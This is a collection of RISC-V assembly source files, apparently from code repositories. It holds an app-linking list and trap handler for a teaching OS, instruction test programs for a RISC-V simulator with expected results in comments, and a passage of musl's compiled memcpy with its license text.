.incbin "../user/target/riscv64gc-unknown-none-elf/release/forkexec"
app_1_end:
.section .data
.global app_2_start
.global app_2_end
.align 3
app_2_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/forktest"
app_2_end:
.section .data
.global app_3_start
.global app_3_end
.align 3
app_3_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/forktest2"
app_3_end:
.section .data
.global app_4_start
.global app_4_end
.align 3
app_4_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/forktest_simple"
app_4_end:
.section .data
.global app_5_start
.global app_5_end
.align 3
app_5_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/forktree"
app_5_end:
.section .data
.global app_6_start
.global app_6_end
.align 3
app_6_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/hello_world"
app_6_end:
.section .data
.global app_7_start
.global app_7_end
.align 3
app_7_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/initproc"
app_7_end:
.section .data
.global app_8_start
.global app_8_end
.align 3
app_8_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/matrix"
app_8_end:
.section .data
.global app_9_start
.global app_9_end
.align 3
app_9_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/mem"
app_9_end:
.section .data
.global app_10_start
.global app_10_end
.align 3
app_10_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/sleep"
app_10_end:
.section .data
.global app_11_start
.global app_11_end
.align 3
app_11_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/sleep_simple"
app_11_end:
.section .data
.global app_12_start
.global app_12_end
.align 3
app_12_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/spawntest"
app_12_end:
.section .data
.global app_13_start
.global app_13_end
.align 3
app_13_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/stack_overflow"
app_13_end:
.section .data
.global app_14_start
.global app_14_end
.align 3
app_14_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/stridetest"
app_14_end:
.section .data
.global app_15_start
.global app_15_end
.align 3
app_15_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/user_shell"
app_15_end:
.section .data
.global app_16_start
.global app_16_end
.align 3
app_16_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/usertests"
app_16_end:
.section .data
.global app_17_start
.global app_17_end
.align 3
app_17_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/usertests-simple"
app_17_end:
.section .data
.global app_18_start
.global app_18_end
.align 3
app_18_start:
.incbin "../user/target/riscv64gc-unknown-none-elf/release/yield"
app_18_end:
|
mikotopku/os | 1,640 | src/trap/trap.S | .altmacro
.macro SAVE_GP n
sd x\n, \n*8(sp)
.endm
.macro LOAD_GP n
ld x\n, \n*8(sp)
.endm
.section .text.trampoline
.globl __alltraps
.globl __restore
.align 2
__alltraps:
csrrw sp, sscratch, sp
# now sp->*TrapContext in user space, sscratch->user stack
# save other general purpose registers
sd x1, 1*8(sp)
# skip sp(x2), we will save it later
sd x3, 3*8(sp)
# skip tp(x4), application does not use it
# save x5~x31
.set n, 5
.rept 27
SAVE_GP %n
.set n, n+1
.endr
# we can use t0/t1/t2 freely, because they have been saved in TrapContext
csrr t0, sstatus
csrr t1, sepc
sd t0, 32*8(sp)
sd t1, 33*8(sp)
# read user stack from sscratch and save it in TrapContext
csrr t2, sscratch
sd t2, 2*8(sp)
# load kernel_satp into t0
ld t0, 34*8(sp)
# load trap_handler into t1
ld t1, 36*8(sp)
# move to kernel_sp
ld sp, 35*8(sp)
# switch to kernel space
csrw satp, t0
sfence.vma
# jump to trap_handler
jr t1
__restore:
# a0: *TrapContext in user space(Constant); a1: user space token
# switch to user space
csrw satp, a1
sfence.vma
csrw sscratch, a0
mv sp, a0
# now sp points to TrapContext in user space, start restoring based on it
# restore sstatus/sepc
ld t0, 32*8(sp)
ld t1, 33*8(sp)
csrw sstatus, t0
csrw sepc, t1
# restore general purpose registers except x0/sp/tp
ld x1, 1*8(sp)
ld x3, 3*8(sp)
.set n, 5
.rept 27
LOAD_GP %n
.set n, n+1
.endr
# back to user stack
ld sp, 2*8(sp)
sret
|
minhcly95/riscv_sim | 7,563 | asm/src/int_test.s | .global _start
.text
_start:
# Load the base addr of the trace array
li x31, 0x00001000
# Load 2 random 32-bit numbers
li x1, 0xbcfec832
li x2, 0x51290ce3
# ---------------- OP-IMM -----------------
# ADDI
addi x3, x1, 0xfffff89b # Should be 0xbcfec0cd
sw x3, 0(x31)
addi x3, x2, 0x3b2 # Should be 0x51291095
sw x3, 4(x31)
# XORI
xori x3, x1, 0xfffff89b # Should be 0x430130a9
sw x3, 8(x31)
xori x3, x2, 0x3b2 # Should be 0x51290f51
sw x3, 12(x31)
# ORI
ori x3, x1, 0xfffff89b # Should be 0xfffff8bb
sw x3, 16(x31)
ori x3, x2, 0x3b2 # Should be 0x51290ff3
sw x3, 20(x31)
# ANDI
andi x3, x1, 0xfffff89b # Should be 0xbcfec812
sw x3, 24(x31)
andi x3, x2, 0x3b2 # Should be 0x000000a2
sw x3, 28(x31)
# SLTI
slti x3, x1, 0xfffff89b # Should be 0x00000001
sw x3, 32(x31)
slti x3, x1, 0x3b2 # Should be 0x00000001
sw x3, 36(x31)
slti x3, x2, 0xfffff89b # Should be 0x00000000
sw x3, 40(x31)
slti x3, x2, 0x3b2 # Should be 0x00000000
sw x3, 44(x31)
# SLTIU
sltiu x3, x1, 0xfffff89b # Should be 0x00000001
sw x3, 48(x31)
sltiu x3, x1, 0x3b2 # Should be 0x00000000
sw x3, 52(x31)
sltiu x3, x2, 0xfffff89b # Should be 0x00000001
sw x3, 56(x31)
sltiu x3, x2, 0x3b2 # Should be 0x00000000
sw x3, 60(x31)
# SLLI
slli x3, x1, 11 # Should be 0xf6419000
sw x3, 64(x31)
slli x3, x2, 2 # Should be 0x44a4338c
sw x3, 68(x31)
# SRLI
srli x3, x1, 11 # Should be 0x00179fd9
sw x3, 72(x31)
srli x3, x2, 2 # Should be 0x144a4338
sw x3, 76(x31)
# SRAI
srai x3, x1, 11 # Should be 0xfff79fd9
sw x3, 80(x31)
srai x3, x2, 2 # Should be 0x144a4338
sw x3, 84(x31)
# ------------------ OP -------------------
# ADD
add x4, x1, x2 # Should be 0x0e27d515
sw x4, 88(x31)
# SUB
sub x3, x1, x2 # Should be 0x6bd5bb4f
sw x3, 92(x31)
sub x3, x2, x1 # Should be 0x942a44b1
sw x3, 96(x31)
# XOR
xor x3, x1, x2 # Should be 0xedd7c4d1
sw x3, 100(x31)
# OR
or x3, x1, x2 # Should be 0xfdffccf3
sw x3, 104(x31)
# AND
and x3, x1, x2 # Should be 0x10280822
sw x3, 108(x31)
# SLT
slt x3, x1, x2 # Should be 0x00000001
sw x3, 112(x31)
slt x3, x2, x1 # Should be 0x00000000
sw x3, 116(x31)
slt x3, x1, x1 # Should be 0x00000000
sw x3, 120(x31)
slt x3, x2, x2 # Should be 0x00000000
sw x3, 124(x31)
# SLTU
sltu x3, x1, x2 # Should be 0x00000000
sw x3, 128(x31)
sltu x3, x2, x1 # Should be 0x00000001
sw x3, 132(x31)
# SLL
sll x3, x1, x2 # Should be 0xe7f64190
sw x3, 136(x31)
sll x3, x2, x1 # Should be 0x338c0000
sw x3, 140(x31)
# SRL
srl x3, x1, x2 # Should be 0x179fd906
sw x3, 144(x31)
srl x3, x2, x1 # Should be 0x0000144a
sw x3, 148(x31)
# SRA
sra x3, x1, x2 # Should be 0xf79fd906
sw x3, 152(x31)
sra x3, x2, x1 # Should be 0x0000144a
sw x3, 156(x31)
# -------------- LUI / AUIPC --------------
# LUI
lui x3, 0xc42bd # Should be 0xc42bd000
sw x3, 160(x31)
lui x3, 0x97bd2 # Should be 0x97bd2000
sw x3, 164(x31)
# AUIPC (PC is 0x164)
auipc x3, 0xc42bd # Should be 0xc42bd164
sw x3, 168(x31)
auipc x3, 0x97bd2 # Should be 0x97bd216c
sw x3, 172(x31)
# ------------- LOAD / STORE --------------
# SB (x3 should be 0x97bd216c, x4 should be 0x0e27d515)
sb x1, 176(x31)
sb x2, 177(x31)
sb x3, 178(x31)
sb x4, 179(x31) # Should be 0x156ce332
# SH
sh x1, 180(x31)
sh x2, 182(x31) # Should be 0x0ce3c832
sh x3, 184(x31)
sh x4, 186(x31) # Should be 0xd515216c
# LB
lb x3, 176(x31) # Should be 0x00000032
sw x3, 188(x31)
lb x3, 177(x31) # Should be 0xffffffe3
sw x3, 192(x31)
# LBU
lbu x3, 176(x31) # Should be 0x00000032
sw x3, 196(x31)
lbu x3, 177(x31) # Should be 0x000000e3
sw x3, 200(x31)
# LH
lh x3, 180(x31) # Should be 0xffffc832
sw x3, 204(x31)
lh x3, 182(x31) # Should be 0x00000ce3
sw x3, 208(x31)
# LHU
lhu x3, 184(x31) # Should be 0x0000216c
sw x3, 212(x31)
lhu x3, 186(x31) # Should be 0x0000d515
sw x3, 216(x31)
# ----------------- JUMP ------------------
# JAL
li x3, 0x10
sw x3, 220(x31)
jal x4, jal_target
sb x1, 221(x31) # Should skip
jal_target:
sb x1, 222(x31) # Should be 0x00320010
sw x4, 224(x31) # Should be 0x000001e0
# JALR
li x3, 0x11
sw x3, 228(x31)
auipc x4, 0
jalr x5, 13(x4) # Test if the LSB is ignored
sb x2, 229(x31) # Should skip
jalr_target:
sb x2, 230(x31) # Should be 0x00e30011
sw x5, 232(x31) # Should be 0x000001fc
# ---------------- BRANCH -----------------
# BEQ
li x3, 0x12
sw x3, 236(x31)
mv x4, x1
beq x1, x2, beq1
sb x1, 237(x31) # Should take
beq1:
beq x2, x1, beq2
sb x1, 238(x31) # Should take
beq2:
beq x1, x4, beq3
sb x1, 239(x31) # Should skip
beq3: # Should be 0x00323212
# BNE
li x3, 0x13
sw x3, 240(x31)
bne x1, x2, bne1
sb x2, 241(x31) # Should skip
bne1:
bne x2, x1, bne2
sb x2, 242(x31) # Should skip
bne2:
bne x1, x4, bne3
sb x2, 243(x31) # Should take
bne3: # Should be 0xe3000013
# BLT
li x3, 0x14
sw x3, 244(x31)
blt x1, x2, blt1
sb x1, 245(x31) # Should skip
blt1:
blt x2, x1, blt2
sb x1, 246(x31) # Should take
blt2:
blt x1, x4, blt3
sb x1, 247(x31) # Should take
blt3: # Should be 0x32320014
# BGE
li x3, 0x15
sw x3, 248(x31)
bge x1, x2, bge1
sb x2, 249(x31) # Should take
bge1:
bge x2, x1, bge2
sb x2, 250(x31) # Should skip
bge2:
bge x1, x4, bge3
sb x2, 251(x31) # Should skip
bge3: # Should be 0x0000e315
# BLTU
li x3, 0x16
sw x3, 252(x31)
bltu x1, x2, bltu1
sb x1, 253(x31) # Should take
bltu1:
bltu x2, x1, bltu2
sb x1, 254(x31) # Should skip
bltu2:
bltu x1, x4, bltu3
sb x1, 255(x31) # Should take
bltu3: # Should be 0x32003216
# BGEU
li x3, 0x17
sw x3, 256(x31)
bgeu x1, x2, bgeu1
sb x2, 257(x31) # Should skip
bgeu1:
bgeu x2, x1, bgeu2
sb x2, 258(x31) # Should take
bgeu2:
bgeu x1, x4, bgeu3
sb x2, 259(x31) # Should skip
bgeu3: # Should be 0x00e30017
# ---------------- FENCE ------------------
fence
sw x1, 260(x31) # Should be 0xbcfec832
# ---------------- ECALL ------------------
ecall
|
minhcly95/riscv_sim | 3,170 | asm/src/mul_test.s | .global _start
.text
_start:
# Load the base addr of the trace array
li x31, 0x00001000
# Load 2 random 32-bit numbers
li x1, 0xbcfec832
li x2, 0x51290ce3
# ----------------- MUL -------------------
# MUL x1 * x2
mul x3, x1, x2 # Should be 0x694fdc56
sw x3, 0(x31)
mulh x3, x1, x2 # Should be 0xeac1dec6
sw x3, 4(x31)
mulhu x3, x1, x2 # Should be 0x3beaeba9
sw x3, 8(x31)
mulhsu x3, x1, x2 # Should be 0xeac1dec6
sw x3, 12(x31)
mulhsu x3, x2, x1 # Should be 0x3beaeba9
sw x3, 16(x31)
# MUL x1 * x1
mul x3, x1, x1 # Should be 0x4fc629c4
sw x3, 20(x31)
mulh x3, x1, x1 # Should be 0x1189a337
sw x3, 24(x31)
mulhu x3, x1, x1 # Should be 0x8b87339b
sw x3, 28(x31)
mulhsu x3, x1, x1 # Should be 0xce886b69
sw x3, 32(x31)
# MUL x2 * x2
mul x3, x2, x2 # Should be 0xc75c1149
sw x3, 36(x31)
mulh x3, x2, x2 # Should be 0x19bb00bc
sw x3, 40(x31)
mulhu x3, x2, x2 # Should be 0x19bb00bc
sw x3, 44(x31)
mulhsu x3, x2, x2 # Should be 0x19bb00bc
sw x3, 48(x31)
# --------------- DIV REM -----------------
li x2, 0xff290ce3
# DIV
div x3, x1, x2 # Should be 0x0000004f
sw x3, 52(x31)
div x3, x2, x1 # Should be 0x00000000
sw x3, 56(x31)
# DIVU
divu x3, x1, x2 # Should be 0x00000000
sw x3, 60(x31)
divu x3, x2, x1 # Should be 0x00000001
sw x3, 64(x31)
# REM
rem x3, x1, x2 # Should be 0xff53ce25
sw x3, 68(x31)
rem x3, x2, x1 # Should be 0xff290ce3
sw x3, 72(x31)
# REMU
remu x3, x1, x2 # Should be 0xbcfec832
sw x3, 76(x31)
remu x3, x2, x1 # Should be 0x422a44b1
sw x3, 80(x31)
# -------------- DIV ZERO -----------------
li x2, 0x51290ce3
# DIV
div x3, x1, x0 # Should be 0xffffffff
sw x3, 84(x31)
div x3, x2, x0 # Should be 0xffffffff
sw x3, 88(x31)
# DIVU
divu x3, x1, x0 # Should be 0xffffffff
sw x3, 92(x31)
divu x3, x2, x0 # Should be 0xffffffff
sw x3, 96(x31)
# REM
rem x3, x1, x0 # Should be 0xbcfec832
sw x3, 100(x31)
rem x3, x2, x0 # Should be 0x51290ce3
sw x3, 104(x31)
# REMU
remu x3, x1, x0 # Should be 0xbcfec832
sw x3, 108(x31)
remu x3, x2, x0 # Should be 0x51290ce3
sw x3, 112(x31)
# ------------ DIV OVERFLOW ---------------
li x1, 0x80000000
li x2, 0xffffffff
# DIV
div x3, x1, x2 # Should be 0x80000000
sw x3, 116(x31)
# DIVU
divu x3, x1, x2 # Should be 0x00000000
sw x3, 120(x31)
# REM
rem x3, x1, x2 # Should be 0x00000000
sw x3, 124(x31)
# REMU
remu x3, x1, x2 # Should be 0x80000000
sw x3, 128(x31)
# ---------------- ECALL ------------------
ecall
|
minhcly95/riscv_sim | 1,044 | asm/src/csr_test.s | .global _start
.text
_start:
# Load the base addr of the trace array
li x31, 0x00001000
# Load some random 32-bit numbers
li x1, 0xbcfec832
li x2, 0x51290ce3
li x4, 0x0e27d515
# ----------------- MUL -------------------
# CSRRW
csrw mscratch, x4
csrrw x3, mscratch, x1 # Should be 0x0e27d515
sw x3, 0(x31)
# CSRRS
csrrs x3, mscratch, x2 # Should be 0xbcfec832
sw x3, 4(x31)
# CSRRC
csrrc x3, mscratch, x1 # Should be 0xfdffccf3
sw x3, 8(x31)
# CSRRWI
csrrwi x3, mscratch, 0x13 # Should be 0x410104c1
sw x3, 12(x31)
csrrw x3, mscratch, x2 # Should be 0x00000013
sw x3, 16(x31)
# CSRRSI
csrrsi x3, mscratch, 0x07 # Should be 0x51290ce3
sw x3, 20(x31)
# CSRRCI
csrrci x3, mscratch, 0x1d # Should be 0x51290ce7
sw x3, 24(x31)
csrr x3, mscratch # Should be 0x51290ce2
sw x3, 28(x31)
# ---------------- ECALL ------------------
ecall
|
minhcly95/riscv_sim | 3,416 | asm/src/amo_test.s | .global _start
.text
_start:
# Load the base addr of the trace array
li x31, 0x00001000
# Load 2 random 32-bit numbers
li x1, 0xbcfec832
li x2, 0x51290ce3
# ----------------- AMO -------------------
# AMOSWAP
sw x1, (x31)
amoswap.w x3, x2, (x31) # Should be 0x51290ce3
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 8
sw x2, (x31)
amoswap.w x3, x1, (x31) # Should be 0xbcfec832
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 16
# AMOADD
sw x1, (x31)
amoadd.w x3, x2, (x31) # Should be 0x0e27d515
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 24
sw x2, (x31)
amoadd.w x3, x1, (x31) # Should be 0x0e27d515
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 32
# AMOXOR
sw x1, (x31)
amoxor.w x3, x2, (x31) # Should be 0xedd7c4d1
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 40
sw x2, (x31)
amoxor.w x3, x1, (x31) # Should be 0xedd7c4d1
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 48
# AMOOR
sw x1, (x31)
amoor.w x3, x2, (x31) # Should be 0xfdffccf3
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 56
sw x2, (x31)
amoor.w x3, x1, (x31) # Should be 0xfdffccf3
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 64
# AMOAND
sw x1, (x31)
amoand.w x3, x2, (x31) # Should be 0x10280822
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 72
sw x2, (x31)
amoand.w x3, x1, (x31) # Should be 0x10280822
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 80
# AMOMIN
sw x1, (x31)
amomin.w x3, x2, (x31) # Should be 0xbcfec832
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 88
sw x2, (x31)
amomin.w x3, x1, (x31) # Should be 0xbcfec832
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 96
# AMOMAX
sw x1, (x31)
amomax.w x3, x2, (x31) # Should be 0x51290ce3
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 104
sw x2, (x31)
amomax.w x3, x1, (x31) # Should be 0x51290ce3
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 112
# AMOMINU
sw x1, (x31)
amominu.w x3, x2, (x31) # Should be 0x51290ce3
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 120
sw x2, (x31)
amominu.w x3, x1, (x31) # Should be 0x51290ce3
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 128
# AMOMAXU
sw x1, (x31)
amomaxu.w x3, x2, (x31) # Should be 0xbcfec832
sw x3, 4(x31) # Should be 0xbcfec832
addi x31, x31, 8 # Base + 136
sw x2, (x31)
amomaxu.w x3, x1, (x31) # Should be 0xbcfec832
sw x3, 4(x31) # Should be 0x51290ce3
addi x31, x31, 8 # Base + 144
# ---------------- ECALL ------------------
ecall
|
minhcly95/riscv_sim | 3,361 | asm/src/lrsc_test.s | .global _start
.text
_start:
# Load the base addr of the trace array
li x31, 0x00001000
# Addr to test lr/sc
li x30, 0x00000ffc # Main addr
li x29, 0x00000ff8 # Other addr
# Load 2 random 32-bit numbers
li x1, 0xbcfec832
li x2, 0x51290ce3
# --------------- LR -> SC ----------------
# Same addr
sw x1, (x30)
lr.w x3, (x30)
sw x3, 0(x31) # Should be 0xbcfec832
sc.w x4, x2, (x30) # Should succeed
sw x4, 4(x31) # Should be 0x00000000
# Other addr
lr.w x3, (x30)
sw x3, 8(x31) # Should be 0x51290ce3
sc.w x4, x2, (x29) # Should fail
sw x4, 12(x31) # Should be 0x00000001
# ------------ LR -> SC -> SC -------------
# Same addr
lr.w x3, (x30)
sw x3, 16(x31) # Should be 0x51290ce3
sc.w x4, x1, (x30) # Should succeed
sc.w x5, x2, (x30) # Should fail
sw x4, 20(x31) # Should be 0x00000000
sw x5, 24(x31) # Should be 0x00000001
# Other addr
lr.w x3, (x30)
sw x3, 28(x31) # Should be 0xbcfec832
sc.w x4, x2, (x29) # Should fail
sc.w x5, x2, (x30) # Should fail
sw x4, 32(x31) # Should be 0x00000001
sw x5, 36(x31) # Should be 0x00000001
# ------------ LR -> SW -> SC -------------
# Same addr
lr.w x3, (x30)
sw x3, 40(x31) # Should be 0xbcfec832
sw x2, (x30) # Should invalidate
sc.w x4, x1, (x30) # Should fail
sw x4, 44(x31) # Should be 0x00000001
# Other addr
lr.w x3, (x30)
sw x3, 48(x31) # Should be 0x51290ce3
sw x1, (x29) # Should not invalidate
sc.w x4, x1, (x30) # Should succeed
sw x4, 52(x31) # Should be 0x00000000
# ------------ LR -> SH -> SC -------------
# Same addr + 2
addi x28, x30, 2
lr.w x3, (x30)
sw x3, 56(x31) # Should be 0xbcfec832
sh x2, (x28) # Should invalidate
sc.w x4, x1, (x30) # Should fail
sw x4, 60(x31) # Should be 0x00000001
# Other addr + 2
addi x27, x29, 2
lr.w x3, (x30)
sw x3, 64(x31) # Should be 0x0ce3c832
sh x1, (x27) # Should not invalidate
sc.w x4, x1, (x30) # Should succeed
sw x4, 68(x31) # Should be 0x00000000
# ------------ LR -> SB -> SC -------------
# Same addr + 3
addi x28, x30, 3
lr.w x3, (x30)
sw x3, 72(x31) # Should be 0xbcfec832
sb x2, (x28) # Should invalidate
sc.w x4, x1, (x30) # Should fail
sw x4, 76(x31) # Should be 0x00000001
# Other addr + 3
addi x27, x29, 3
lr.w x3, (x30)
sw x3, 80(x31) # Should be 0xe3fec832
sb x1, (x27) # Should not invalidate
sc.w x4, x1, (x30) # Should succeed
sw x4, 84(x31) # Should be 0x00000000
# ------------ LR -> LR -> SC -------------
# Other addr
lr.w x3, (x30)
sw x3, 88(x31) # Should be 0xbcfec832
lr.w x3, (x29)
sc.w x4, x2, (x30) # Should fail
sw x4, 92(x31) # Should be 0x00000001
lw x3, (x30)
sw x3, 96(x31) # Should be 0xbcfec832
# ---------------- ECALL ------------------
ecall
|
mintair-xyz/succinct-sp1 | 11,855 | crates/zkvm/entrypoint/src/memcpy.s | // This is musl-libc commit 37e18b7bf307fa4a8c745feebfcba54a0ba74f30:
//
// src/string/memcpy.c
//
// This was compiled into assembly with:
//
// clang-14 -target riscv32 -march=rv32im -O3 -S memcpy.c -nostdlib -fno-builtin -funroll-loops
//
// and labels manually updated to not conflict.
//
// musl as a whole is licensed under the following standard MIT license:
//
// ----------------------------------------------------------------------
// Copyright © 2005-2020 Rich Felker, et al.
//
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to
// permit persons to whom the Software is furnished to do so, subject to
// the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
// IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
// CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
// TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
// SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
// ----------------------------------------------------------------------
//
// Authors/contributors include:
//
// A. Wilcox
// Ada Worcester
// Alex Dowad
// Alex Suykov
// Alexander Monakov
// Andre McCurdy
// Andrew Kelley
// Anthony G. Basile
// Aric Belsito
// Arvid Picciani
// Bartosz Brachaczek
// Benjamin Peterson
// Bobby Bingham
// Boris Brezillon
// Brent Cook
// Chris Spiegel
// Clément Vasseur
// Daniel Micay
// Daniel Sabogal
// Daurnimator
// David Carlier
// David Edelsohn
// Denys Vlasenko
// Dmitry Ivanov
// Dmitry V. Levin
// Drew DeVault
// Emil Renner Berthing
// Fangrui Song
// Felix Fietkau
// Felix Janda
// Gianluca Anzolin
// Hauke Mehrtens
// He X
// Hiltjo Posthuma
// Isaac Dunham
// Jaydeep Patil
// Jens Gustedt
// Jeremy Huntwork
// Jo-Philipp Wich
// Joakim Sindholt
// John Spencer
// Julien Ramseier
// Justin Cormack
// Kaarle Ritvanen
// Khem Raj
// Kylie McClain
// Leah Neukirchen
// Luca Barbato
// Luka Perkov
// M Farkas-Dyck (Strake)
// Mahesh Bodapati
// Markus Wichmann
// Masanori Ogino
// Michael Clark
// Michael Forney
// Mikhail Kremnyov
// Natanael Copa
// Nicholas J. Kain
// orc
// Pascal Cuoq
// Patrick Oppenlander
// Petr Hosek
// Petr Skocik
// Pierre Carrier
// Reini Urban
// Rich Felker
// Richard Pennington
// Ryan Fairfax
// Samuel Holland
// Segev Finer
// Shiz
// sin
// Solar Designer
// Stefan Kristiansson
// Stefan O'Rear
// Szabolcs Nagy
// Timo Teräs
// Trutz Behn
// Valentin Ochs
// Will Dietz
// William Haddon
// William Pitcock
//
// Portions of this software are derived from third-party works licensed
// under terms compatible with the above MIT license:
//
// The TRE regular expression implementation (src/regex/reg* and
// src/regex/tre*) is Copyright © 2001-2008 Ville Laurikari and licensed
// under a 2-clause BSD license (license text in the source files). The
// included version has been heavily modified by Rich Felker in 2012, in
// the interests of size, simplicity, and namespace cleanliness.
//
// Much of the math library code (src/math/* and src/complex/*) is
// Copyright © 1993,2004 Sun Microsystems or
// Copyright © 2003-2011 David Schultz or
// Copyright © 2003-2009 Steven G. Kargl or
// Copyright © 2003-2009 Bruce D. Evans or
// Copyright © 2008 Stephen L. Moshier or
// Copyright © 2017-2018 Arm Limited
// and labelled as such in comments in the individual source files. All
// have been licensed under extremely permissive terms.
//
// The ARM memcpy code (src/string/arm/memcpy.S) is Copyright © 2008
// The Android Open Source Project and is licensed under a two-clause BSD
// license. It was taken from Bionic libc, used on Android.
//
// The AArch64 memcpy and memset code (src/string/aarch64/*) are
// Copyright © 1999-2019, Arm Limited.
//
// The implementation of DES for crypt (src/crypt/crypt_des.c) is
// Copyright © 1994 David Burren. It is licensed under a BSD license.
//
// The implementation of blowfish crypt (src/crypt/crypt_blowfish.c) was
// originally written by Solar Designer and placed into the public
// domain. The code also comes with a fallback permissive license for use
// in jurisdictions that may not recognize the public domain.
//
// The smoothsort implementation (src/stdlib/qsort.c) is Copyright © 2011
// Valentin Ochs and is licensed under an MIT-style license.
//
// The x86_64 port was written by Nicholas J. Kain and is licensed under
// the standard MIT terms.
//
// The mips and microblaze ports were originally written by Richard
// Pennington for use in the ellcc project. The original code was adapted
// by Rich Felker for build system and code conventions during upstream
// integration. It is licensed under the standard MIT terms.
//
// The mips64 port was contributed by Imagination Technologies and is
// licensed under the standard MIT terms.
//
// The powerpc port was also originally written by Richard Pennington,
// and later supplemented and integrated by John Spencer. It is licensed
// under the standard MIT terms.
//
// All other files which have no copyright comments are original works
// produced specifically for use as part of this library, written either
// by Rich Felker, the main author of the library, or by one or more
// contributors listed above. Details on authorship of individual files
// can be found in the git version control history of the project. The
// omission of copyright and license comments in each file is in the
// interest of source tree size.
//
// In addition, permission is hereby granted for all public header files
// (include/* and arch/* /bits/* ) and crt files intended to be linked into
// applications (crt/*, ldso/dlstart.c, and arch/* /crt_arch.h) to omit
// the copyright notice and permission notice otherwise required by the
// license, and to use these files without any requirement of
// attribution. These files include substantial contributions from:
//
// Bobby Bingham
// John Spencer
// Nicholas J. Kain
// Rich Felker
// Richard Pennington
// Stefan Kristiansson
// Szabolcs Nagy
//
// all of whom have explicitly granted such permission.
//
// This file previously contained text expressing a belief that most of
// the files covered by the above exception were sufficiently trivial not
// to be subject to copyright, resulting in confusion over whether it
// negated the permissions granted in the license. In the spirit of
// permissive licensing, and of not having licensing issues being an
// obstacle to adoption, that text has been removed.
.text
.attribute 4, 16
.attribute 5, "rv32im"
.file "musl_memcpy.c"
.globl memcpy
.p2align 2
.type memcpy,@function
memcpy:
andi a3, a1, 3
seqz a3, a3
seqz a4, a2
or a3, a3, a4
bnez a3, .LBBmemcpy0_11
addi a5, a1, 1
mv a6, a0
.LBBmemcpy0_2:
lb a7, 0(a1)
addi a4, a1, 1
addi a3, a6, 1
sb a7, 0(a6)
addi a2, a2, -1
andi a1, a5, 3
snez a1, a1
snez a6, a2
and a7, a1, a6
addi a5, a5, 1
mv a1, a4
mv a6, a3
bnez a7, .LBBmemcpy0_2
andi a1, a3, 3
beqz a1, .LBBmemcpy0_12
.LBBmemcpy0_4:
li a5, 32
bltu a2, a5, .LBBmemcpy0_26
li a5, 3
beq a1, a5, .LBBmemcpy0_19
li a5, 2
beq a1, a5, .LBBmemcpy0_22
li a5, 1
bne a1, a5, .LBBmemcpy0_26
lw a5, 0(a4)
sb a5, 0(a3)
srli a1, a5, 8
sb a1, 1(a3)
srli a6, a5, 16
addi a1, a3, 3
sb a6, 2(a3)
addi a2, a2, -3
addi a3, a4, 16
li a4, 16
.LBBmemcpy0_9:
lw a6, -12(a3)
srli a5, a5, 24
slli a7, a6, 8
lw t0, -8(a3)
or a5, a7, a5
sw a5, 0(a1)
srli a5, a6, 24
slli a6, t0, 8
lw a7, -4(a3)
or a5, a6, a5
sw a5, 4(a1)
srli a6, t0, 24
slli t0, a7, 8
lw a5, 0(a3)
or a6, t0, a6
sw a6, 8(a1)
srli a6, a7, 24
slli a7, a5, 8
or a6, a7, a6
sw a6, 12(a1)
addi a1, a1, 16
addi a2, a2, -16
addi a3, a3, 16
bltu a4, a2, .LBBmemcpy0_9
addi a4, a3, -13
j .LBBmemcpy0_25
.LBBmemcpy0_11:
mv a3, a0
mv a4, a1
andi a1, a3, 3
bnez a1, .LBBmemcpy0_4
.LBBmemcpy0_12:
li a1, 16
bltu a2, a1, .LBBmemcpy0_15
li a1, 15
.LBBmemcpy0_14:
lw a5, 0(a4)
lw a6, 4(a4)
lw a7, 8(a4)
lw t0, 12(a4)
sw a5, 0(a3)
